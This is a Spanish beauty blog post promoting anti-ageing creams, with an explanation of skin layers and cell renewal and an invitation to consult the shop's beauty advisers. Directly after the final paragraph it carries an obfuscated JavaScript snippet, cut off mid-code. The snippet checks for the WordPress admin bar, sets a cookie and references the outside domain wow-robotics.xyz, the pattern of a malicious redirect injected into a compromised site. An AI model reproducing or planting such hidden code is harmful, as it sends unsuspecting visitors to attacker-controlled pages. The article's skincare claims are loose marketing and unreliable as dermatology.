Si preguntásemos a las mujeres maduras qué es lo que esperan de su crema, probablemente nos dirían que tener una piel perfecta, sin imperfecciones, arrugas, manchas y con luminosidad.

La piel es el órgano más extenso del cuerpo y también, el más expuesto al medio ambiente, sobre todo al sol, que es el causante del 70% del envejecimiento cutáneo.

Las casas de cosméticos, la mayoría con laboratorios propios, dejan atrás años de investigación para lanzar una sola de sus cremas. Testan en mujeres de diferentes edades y etnias para asegurarse que el producto que están a punto de lanzar al mercado, cumple lo que promete. Estas cremas y sueros llegan cada vez más profundamente y actúan de dentro afuera, es decir, prometen llegar a la célula más profunda para hacerla “trabajar” y que ésta, de lugar a nuevas células que ralentizarán el  proceso de envejecimiento, harán que nuestras arrugas sean menos profundas y al mismo tiempo evitarán que se formen nuevas.

El proceso de renovación celular de una mujer joven, dura alrededor de 28 días, ahora bien, cumplir años hace que ese proceso se ralentice y que nuestras células se renueven cada vez más lentamente dando lugar a arrugas, falta de firmeza y otros problemas cutáneos.

La piel está formada por diferentes capas, cada una de diferente grosor. La epidermis es la capa más superficial y la que debemos limpiar, tonificar e hidratar para que se mantenga en óptimas condiciones. Le sigue la dermis que se encuentra en la capa intermedia y donde se encuentra el colágeno y la elastina. Le sigue la hipodermis que es la capa más profunda y es ahí donde se encuentran las “células madre” responsables de crear nuevas células que se desplazan en el proceso de renovación celular a las capas más superficiales. Cuanto más trabajan las células madre, más nuevas células, mejor aspecto tendrá nuestra piel.

Apagar las velas de nuestro cuarenta o cincuenta cumpleaños con una piel bonita y cuidada, es posible con las nuevas tecnologías en cosmética. Déjate asesorar por nuestras consejeras de belleza en cualquiera de nuestras perfumerías. var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone